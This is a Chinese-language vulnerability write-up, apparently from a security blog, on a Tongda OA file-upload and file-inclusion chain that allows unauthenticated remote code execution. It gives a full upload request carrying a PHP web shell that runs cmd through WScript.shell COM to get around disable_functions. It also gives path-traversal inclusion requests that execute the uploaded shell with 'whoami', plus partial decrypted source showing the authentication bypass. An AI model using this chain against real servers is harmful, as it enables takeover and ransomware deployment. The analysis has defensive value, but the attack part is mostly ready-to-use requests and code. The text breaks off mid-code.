Tag:通达OA

Tag (通达OA)'s result:

通达(tongda)OA文件上传和文件包含漏洞重现及分析

0x00 概述 20200317,网上爆出通达oa被利用0day中勒索病毒的消息,官方已出漏洞补丁。 该0day为利用文件上传和文件包含组合利用进行RCE,无须认证。   0x01 影响范围 2013,2013增强版,2015,2016,2017,v11 //补丁只看见v11(2020)有geteway.php(文件包含漏洞)补丁   0x02 漏洞重现 利用v11版本: 文件包含漏洞 http://localhost/ispirit/interface/gateway.php?json={}&url=../../ispirit/../../nginx/logs/oa.access.log   文件上传漏洞 上传文件路径在非webroot目录,如: “D:\MYOA\attach\im\2003\ddd.test.jpg” 请求数据包: POST /ispirit/im/upload.php HTTP/1.1 Host: 127.0.0.1 Connection: close Accept-Encoding: gzip, deflate Accept: */* User-Agent: python-requests/2.20.0 Content-Length: 633 Content-Type: multipart/form-data; boundary=ee65cd98fdbee896acd30a7b2552b6b5 –ee65cd98fdbee896acd30a7b2552b6b5 Content-Disposition: form-data; name=”P” x –ee65cd98fdbee896acd30a7b2552b6b5 Content-Disposition: form-data; name=”UPLOAD_MODE” 1 –ee65cd98fdbee896acd30a7b2552b6b5 Content-Disposition: form-data; name=”DEST_UID” 1 –ee65cd98fdbee896acd30a7b2552b6b5 Content-Disposition: form-data; name=”ATTACHMENT”; filename=”test07.jpg” Content-Type: image/jpeg <?php $command=$_POST[‘cmd’]; $wsh = new COM(‘WScript.shell’); $exec = $wsh->exec(“cmd /c “.$command); $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput; ?> –ee65cd98fdbee896acd30a7b2552b6b5– 再利用文件包含执行php代码 json=%7B%22url%22%3A%22%2Fgeneral%2F..%2F..%2Fattach%2Fim%2F2003%2F1941158481.test07.jpg%22%7D&cmd=whoami 或者这样包含也行 http://127.0.0.1/ispirit/interface/gateway.php?json={}&url=../../ispirit/../../attach/im/2003/1044529275.test09.jpg //实测无法直接执行phpinfo(); 利用windows的com组件绕过disable_function() <?php $command=$_POST[‘cmd’]; $wsh = new COM(‘WScript.shell’); $exec = $wsh->exec(“cmd /c “.$command); $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput; ?>   0x03 修复方案 打补丁   0x04 漏洞分析 PHP Zend 5.4解密php文件即可 文件上传漏洞分析 upload.php:5 $P = $_POST[‘P’]; if (isset($P) || $P != ”) { ob_start(); include_once ‘inc/session.php’; session_id($P); session_start(); session_write_close(); } else { include_once ‘./auth.php’; } 要有P参数否则会经过auth.php登录验证,不为空即可。 $DEST_UID = $_POST[‘DEST_UID’]; $dataBack = array(); if ($DEST_UID != ” && !td_verify_ids($ids)) { $dataBack = array(‘status’ => 0, ‘content’ => ‘-ERR ‘ . _(‘½ÓÊÕ·½IDÎÞЧ’)); echo json_encode(data2utf8($dataBack)); exit;……